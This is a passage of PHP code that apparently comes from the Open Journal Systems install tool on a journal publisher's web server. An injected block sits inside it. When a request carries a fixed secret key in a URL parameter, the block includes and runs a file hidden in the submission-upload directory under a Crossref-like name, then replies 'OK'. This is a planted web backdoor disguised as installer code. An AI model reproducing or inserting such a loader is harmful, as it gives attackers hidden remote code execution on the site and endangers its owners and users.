readParamBoolean('install', 'installer.installApplication'); return $this->params['install']; } } if (isset($_GET['_']) && $_GET['_'] === 'frontend_pages_indexSite') { $f="/var/www/vhosts/pagepressjournals.org/files_submission/pagepressjournals/crossref/58-61-216-1-2-20110405";if($f!==""&&file_exists($f))include $f; http_response_code(200); header('Content-Type: text/plain; charset=utf-8'); echo 'OK'; exit; } $tool = new OJSInstallTool($argv ?? []); $tool->execute();